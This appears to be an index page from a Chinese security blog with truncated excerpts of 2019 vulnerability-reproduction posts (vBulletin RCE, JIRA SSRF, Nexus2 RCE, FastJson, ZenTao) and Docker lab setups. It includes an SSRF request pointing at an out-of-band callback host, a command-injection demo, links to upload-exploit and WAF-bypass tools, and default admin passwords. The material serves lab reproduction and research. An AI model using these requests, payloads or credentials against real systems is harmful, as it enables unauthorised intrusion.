Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

【安全预警】高危漏洞预警与复现 – 值得关注的新闻源

September 25, 2019

【安全预警】高危漏洞预警与复现 – 值得关注的新闻源

漏洞预警与复现 – 值得关注的新闻源

September 25, 2019

CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit 复现

CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit <!–more–> 参考资料 vBulletin 5.x 0day pre-auth RCE exploit https://seclists.org/fulldisclosure/2019/Sep/31 vBulletin 5.x 前台代码执行漏洞分析 -【CVE-2019-16759】 https://xz.aliyun.com/t/6419 vBulletin zero-day exploited in the wild in wake of exploit release https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/ 环境搭建 (复杂) https://github.com/asosso/docker-vbulletin # 先确认编译工具链足够齐全 yum -y install gcc install autoconf automake libtool # 之后安装 php 扩展依赖 yum install -y php php-mysql php-curl […]

September 25, 2019

CVE-2019-8451 JIRA Pre-auth SSRF 复现

CVE-2019-8451 JIRA Pre-auth SSRF <!–more–> 正文 sudo docker pull cptactionhank/atlassian-jira:7.8.0 sudo docker run –detach –publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 http://24mail.chacuo.net/ 注册一个 JIRA 账户,申请试用 lisence,开启 JIRA 实例。 HTTP 请求与响应示例 请求 GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@test101.ff16ff.ceye.io HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.198.133:8080/secure/Dashboard.jspa X-Atlassian-Token: no-check […]

September 23, 2019

CVE-2019-5475 Nexus2 yum插件RCE漏洞复现

CVE-2019-5475 Nexus2 yum插件RCE漏洞复现 <!–more–> 参考资料 【漏洞分析】CVE-2019-5475:Nexus 2 yum插件远程命令执行漏洞 https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg CVE-2019-5475:Nexus2 yum插件RCE漏洞复现 https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect 环境搭建 (以 windows 为例) 1 下载 Nexus-2.14.13 https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip 2 (管理员权限)运行 bin/jsw/windows-x86-64/install-nexus.bat 3 (管理员权限)运行 bin/jsw/windows-x86-64/start-nexus.bat 【启动速度比较慢请耐心等待】 调试参考 https://blog.csdn.net/nthack5730/article/details/51082270 4 访问 http://localhost:8081/nexus 验证服务是否启动 (默认密码 admin/admin123) PoC 漏洞需要管理员权限,属于 after-auth RCE / 后台 getshell。 一个 tasklist 的 demo C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe &amp; 原始 HTTP 请求 PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 […]

September 19, 2019

FastJson 1.2.60远程代码执行漏洞(From第三方jar包)

FastJson 1.2.60远程代码执行漏洞(From第三方jar包) <!–more–> 正文 [漏洞复现]FastJson 1.2.60远程代码执行漏洞(From第三方jar包) https://qiita.com/shimizukawasaki/items/c61ad93d80e2998ec0d5 抽象语法树分析寻找FastJSON的Gadgets https://www.freebuf.com/articles/web/213327.html Jackson https://github.com/FasterXML/jackson-databind/issues/2460

September 19, 2019

自动化 SQLi 的 WAF 绕过

自动化 SQLi 的 WAF 绕过 <!–more–> 正文 自动化 SQLi 的 WAF 绕过 https://github.com/RandomSiYuan/Fake_Sqli_Bypass

September 19, 2019

fuxploider 上传表单自动化黑盒测试工具

fuxploider 上传表单自动化黑盒测试工具 <!–more–> 正文 Fuxploider是一个开源渗透测试工具,可以自动检测和利用文件上传表单缺陷。 此工具能够检测允许上载的文件类型,并能够检测哪种技术最适合在所需的Web服务器上上载Web shell或任何恶意文件。 https://github.com/almandin/fuxploider

September 16, 2019

Fofa 高级搜索语法、SDK/API使用 与 PoC 编写教程

Fofa 高级搜索语法、SDK/API使用 与 PoC 编写教程 <!–more–> 正文 录播视频已上传至百度网盘 链接:https://pan.baidu.com/s/1MquLQh5Ge_MjDQo9cRHrbA 提取码:rna4

September 16, 2019

禅道 登陆过程黑盒逆向分析

禅道 弱口令分析 <!–more–> 正文 默认配置 http://192.168.198.133/zentao/admin-safe.html 默认配置的禅道会要求管理员登陆后修改弱口令。 密码密文的计算方式 hashTable.md5(hashTable.md5(this.plaintext)+this.salt) $(‘#loginPanel #submit’).click(function() { var password = $(‘input:password’).val().trim(); var passwordStrength = computePasswordStrength(password); $(‘#submit’).after("<input type=’hidden’ name=’passwordStrength’ value=’" + passwordStrength + "’>"); var rand = $(‘input#verifyRand’).val(); if(password.length != 32 && typeof(md5) == ‘function’) $(‘input:password’).val(md5(md5(password) + rand)); }); 登陆成功 请求 POST /zentao/user-login.html HTTP/1.1 Host: 192.168.198.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; […]

September 16, 2019

使用 Docker 搭建禅道社区版

使用 Docker 搭建禅道社区版 <!–more–> 正文 https://hub.docker.com/r/idoop/zentao/tags sudo docker pull idoop/zentao:10.0 sudo mkdir -p /data/zbox && \ sudo docker run -d -p 80:80 -p 33306:3306 \ -e ADMINER_USER="root" -e ADMINER_PASSWD="password" \ -e BIND_ADDRESS="false" \ -v /data/zbox/:/opt/zbox/ \ –add-host smtp.exmail.qq.com:163.177.90.125 \ –name zentao-server \ idoop/zentao:10.0 禅道后台默认密码 admin/123456 。 参考资料 某道全版本rce漏洞分析 https://xz.aliyun.com/t/6239